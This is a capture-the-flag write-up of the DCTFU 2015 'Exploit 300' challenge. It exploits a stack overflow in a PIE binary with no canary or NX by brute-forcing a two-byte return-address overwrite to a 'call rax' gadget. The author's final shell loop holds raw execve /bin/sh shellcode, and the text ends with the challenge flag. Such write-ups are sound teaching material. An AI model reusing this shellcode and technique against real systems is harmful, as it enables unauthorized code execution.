DCTFU CTF 2015 prequals Exploit 300

@mrexcessive WHA

DCTFU 2015 Exploit 300

Keyhole Surgery

 

The problem

Such exploit, much random (Exploit 300)
Just do the obvious, get the flag!
Target: dctfu_*@10.13.37.11:22
Password: see dashboard.
Flag: cat /flag

Pwnable Exploit no-source binary-provided

 

The solution

So we need a shell. We are running the program in a remote ssh session over the challenge VPN.

First step is to pull down the binary using xxd and xxd -r
I've put a copy of the xxd file here https://gist.github.com/mrexcessive/66b4ae7f399bb1ab3cbe

Second step readelf -a and objdump -d on the binary

The program reports that it is expecting input in a fixed format

$ ./e300
./e300 <num> <string>

Of course I try to break the string part...

./e300 $(python -c 'print "2 " + "3" * 4000')
Segmentation fault (core dumped)

This only happens sometimes though... It seems that the first character has to match a random value. Quick look at the code shows us this:

 a3d:    48 8d 45 f0             lea    -0x10(%rbp),%rax
 a41:    48 89 c7                mov    %rax,%rdi
 a44:    b8 00 00 00 00          mov    $0x0,%eax
 a49:    e8 22 fe ff ff          callq  870 
 a4e:    89 c7                   mov    %eax,%edi
 a50:    e8 eb fd ff ff          callq  840      # srand(time()) - so gets same rand() for a second...
 a55:    e8 56 fe ff ff          callq  8b0 
 a5a:    89 c1                   mov    %eax,%ecx

So we generally have to keep running the attacks until the random number selected based on time() lines up with our "2"

Further experiments finds that the segfault still happens with *400 chars

./e300 $(python -c 'print "2 " + "3" * 400')
Segmentation fault (core dumped)

Grabbing the checksec.sh script and running locally tells that there is relocation going on, but not NX.

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   PIE enabled     No RPATH   No RUNPATH   e300

So can I run in gdb on remote ?
Yes.

OK. Sending the *400 input chars to it through gdb. Get these registers

(gdb) info regi
rax            0x7ffc28859fd0    140720988331984
rbx            0x0    0
rcx            0x7ffc2885a140    140720988332352
rdx            0x7ffc2885a140    140720988332352
rsi            0x7ffc2885bd08    140720988339464
rdi            0x7ffc28859fd0    140720988331984
rbp            0x3333333333333333    0x3333333333333333
rsp            0x7ffc2885a108    0x7ffc2885a108
/snip/
rip            0x7efffa718a2d    0x7efffa718a2d

So we got control over $rbp but nothing else yet.

Perhaps I should be sending less not more.

Some more experimentation and I realise that only the lowest 8 bits of EIP can be safely overridden! because of the RELRO.
The program is always loaded on a 256 byte boundary - so we can modify the valid $rip value to anything in the ????aDD range.

We only get to control DD - or things just break.

The way to do this is to send in 312 bytes of padding then the LSB to land in $rip

./e300 $(python -c 'print "2 " + "3"*312 + "\xd6"')
333333333333333333333333333333/snip/33� <number> <something>
Bus error (core dumped)
dctfu_575@e300:~$ ./e300 $(python -c 'print "2 " + "3"*312 + "\xb9"')
Should have been: 365383047
Bus error (core dumped)

So now I'm about 3 hours in... going slow, I know... and think maybe there is a ROP gadget... We have tested that we can get to anywhere in the aDD range of code.


Aside - the ROPgadget tool is great... install it now and play with it, https://github.com/JonathanSalwan/ROPgadget

Then I suggest you try the picoctf Hardcore ROP challenge...


I've put the objdump output - marked up with my comments - on gist for reference, https://gist.github.com/mrexcessive/85d75b8725d07c0afbaa

You can see where I've marked the 'aDD' section of the code as the 'EASILY CALLED BLOCK', because we can definitely cause execution to jump to any of these locations.

However... the subset of ROPgadgets available in this range is poor:

If we restrict to just the ones between a00 and aff
0x0000000000000aeb : add bl, ch ; add eax, 0xb8 ; add cl, cl ; ret
0x0000000000000aef : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x0000000000000af0 : add byte ptr [rax], al ; add cl, cl ; ret
0x0000000000000af1 : add byte ptr [rax], al ; leave ; ret
0x0000000000000af2 : add cl, cl ; ret
0x0000000000000aed : add eax, 0xb8 ; add cl, cl ; ret
0x0000000000000a0f : dec dword ptr [rax - 0x77] ; ret 0x8b48
0x0000000000000a2b : dec ecx ; ret
0x0000000000000a2c : leave ; ret
0x0000000000000aee : mov eax, 0 ; leave ; ret
0x0000000000000a12 : ret 0x8b48
0x0000000000000a6d : ret 0xd089

That is not a lot !
Wasting time

The trouble with ASLR is that the program is one-shot. It runs, it stops. When you run it again everything has moved.

So, I spent a stupid amount of time trying to find a way to determine the addresses for stack or code segments. Often ASLR challenges have a way to exfiltrate a clue to valid code, stack, malloc or libc address spaces.

This one does not... (AFAIK)


If we knew where the stack would be then we could put a NOPsled and shellcode in all those 312 '3' characters and jump to it.

Similarly if we knew where the code segment was then we wouldn't be restricted to just overwriting the LSB of EIP, and could jump to any ROP gadget in the program...

... and if we knew where libc was being loaded (that also moves around) then we could do a libc system() call.


I learned quite a lot about this program.. and explored all the wrong avenues before the right ones.


One thing I noticed is that the random number (range 0..6) which you have to match with the first parameter value in argv[] is strongly dependent on a call to time() followed by a call to srand().  Well, I noticed that earlier, but didn't think to exploit it straight away.  If you run the program 6 times quickly, with all six possible first chars, then you nearly always get a proper run - i.e. one which triggers the memcpy().

At a particularly tired - and not thinking clearly - stage, I build some shell script to run the program multiple times for all possible values of the EIP LSB, and do it 256 times for each one... and 6 times for each of those - to hit the correct time() based rand() value.

for i in 214; do echo "$i  "; for j in $(seq 0 256);
do for k in $(seq 0 5);
do ./e300 $(python -c 'print "'$k' " + "%x"*156 + chr('$i') + chr('$j')');
done; done; done;

However all this revealed was that things were not going to be that simple. There's nothing there to just give us a shell ...

While the big loop was running, I was reading some more background materials on ASLR.
from http://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work and
http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx

We have to fight for shell !!!

I wonder if LD_PRELOAD can be used to get control... Sadly it only works when I'm running inside gdb.

So now I decide to STOP WORRYING about whether there will be a way to get control into shellcode posted in the argv[2] param. I decide it will be possible to do this and that my brain just needs to get some relaxing time, away from staring at the difficult part. So I spend about an hour getting some shellcode to run, using gdb to hack the EIP to my shellcode at the point where I think the exploit will eventually need to do this (on the LEAVE / RET at the end of the strlen()/memcpy() code:

 a01:    48 8b 85 c8 fe ff ff    mov    -0x138(%rbp),%rax
 a08:    48 89 c7                mov    %rax,%rdi
 a0b:    e8 00 fe ff ff          callq  810 <strlen@plt>          # call strlen on it
 a10:    48 89 c2                mov    %rax,%rdx
 a13:    48 8b 8d c8 fe ff ff    mov    -0x138(%rbp),%rcx
 a1a:    48 8d 85 d0 fe ff ff    lea    -0x130(%rbp),%rax
 a21:    48 89 ce                mov    %rcx,%rsi                 # memcpy with strlen bytes (rdx)
 a24:    48 89 c7                mov    %rax,%rdi                 # onto stack - but where is stack !
 a27:    e8 34 fe ff ff          callq  860 <memcpy@plt>
 a2c:    c9                      leaveq 
 a2d:    c3                      retq                 <-- This is the RET (retq = QWORD return address - 64bit model) to shell

Once the shell is running, with the manual start in gdb, then I've got more confidence.

I start to wonder if perhaps I can just overwrite two LSB of EIP... which would let me call any ROP gadget in the program.
Of course it would only work when the second byte was correct... but there are only 256 possible values - and one of the ASLR articles has suggested this an approach to use.

I mess with the program some more... Oh it might be even easier... the third nibble is always 0xa when running in the "EASILY CALLED BLOCK" - which means it would always by 0x9 for the previous block... for example.

So there should only be 16 possible ASLR slots for any particular block.

I review the ROP gadgets available, see https://gist.github.com/mrexcessive/11ecc80397a7bd46ad5a

In block 0x9.. there is a potentially very useful ROP gadget:
0x00000000000009c1 : call rax

Do we have control of rax ?

; this is at the point of execution of the 0xa2d retq
rax            0x7ffd06400de0    140724708314592
rbx            0x0    0
rcx            0x7ffd06400f00    140724708314880
rdx            0x7ffd06400f00    140724708314880
rsi            0x7ffd06402d50    140724708322640
rdi            0x7ffd06400de0    140724708314592
rbp            0x7ffd06400f10    0x7ffd06400f10
rsp            0x7ffd06400dd0    0x7ffd06400dd0
r8             0x1f70    8048
r9             0x1f60    8032
r10            0x1f50    8016
r11            0x7f1cf690cfd0    139762372497360
r12            0x7f1cf6e5f8c0    139762378078400
r13            0x7ffd06401020    140724708315168
r14            0x0    0
r15            0x0    0
rip            0x7f1cf6e5fa2c    0x7f1cf6e5fa2c


(gdb) x/200xw $rsp
0x7ffd06400dd0:    0x7c943c72  0x00000000  0x06402d30  0x00007ffd
0x7ffd06400de0:  [0x90909090] 0x90909090    0x90909090  0x90909090  rdi and rax pointing [here]
0x7ffd06400df0:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e00:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e10:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e20:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e30:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e40:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e50:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e60:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e70:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e80:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e90:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400ea0:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400eb0:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400ec0:    0x90909090  0x90909090  0x31909090  0xd1bb48c0
0x7ffd06400ed0:    0xd091969d  0x48ff978c  0x5453dbf7  0x5752995f
0x7ffd06400ee0:    0x3bb05e54  0x4141050f  0x41414141  0x41414141
0x7ffd06400ef0:    0x41414141  0x41414141  0x41414141  0x41414141
0x7ffd06400f00:  >0x41414141<    0x41414141  0x41414141  0x41414141  rcx and rdx are pointing >here<
0x7ffd06400f10:    0x41414141  0x64636261  0xf6e5*fac5*    0x00007f1c  *fac5* these are the two bytes MSB and LSB of EIP we can overwrite by overflowing the buffer...
0x7ffd06400f20:    0x06401028  0x00007ffd  0xf6e5f8c0  0x00000003

Notice the shellcode has a NOPsled in front...

But REALLY notice that rax is pointing to the start of the NOPsled - which is the location where the memcpy() has just put our argv[2] parameter.

So... if we send in 0xZ9c1 as the two bytes for EIP overwrite - then SOMETIMES (one in 16 times, by chance) the ASLR will position things so that the call $rax is executed.
And we should get a shell!

My first couple of attempts failed, due to over-excited typos...
Then I hit a snag... but had such energy at this point... that I realised it was because 0x09 was a REALLY BAD value to use for Z9

Because it is a TAB character... and splits up the argv[2] value...

So... correcting that I now have:

for i in $(seq 0 100);
do ./e300 $(python -c 'print "2 " + "\x90"*235 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
+ "A" * 46 + "abcd" + chr(0xc1) + chr(0xe9)');
done; echo "FINISHED"

And run it... getting lucky on 4th iteration...

Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
$ ls -la
total 256
drwx------    3 dctfu_574 dctf       4096 Oct  3 18:07 .
d-wx--x--x 8130 root      root     241664 Oct  2 03:04 ..
drwx------    2 dctfu_574 dctf       4096 Oct  3 18:07 .cache
-rwxr-sr-x    1 root      solution   6352 Oct  2 19:52 e300
$ cat /flag
DCTF{2621204f73c01a1cbc995b24a57106ad}$ 

Score flag and Great Big Happy !!

! DCTF{2621204f73c01a1cbc995b24a57106ad}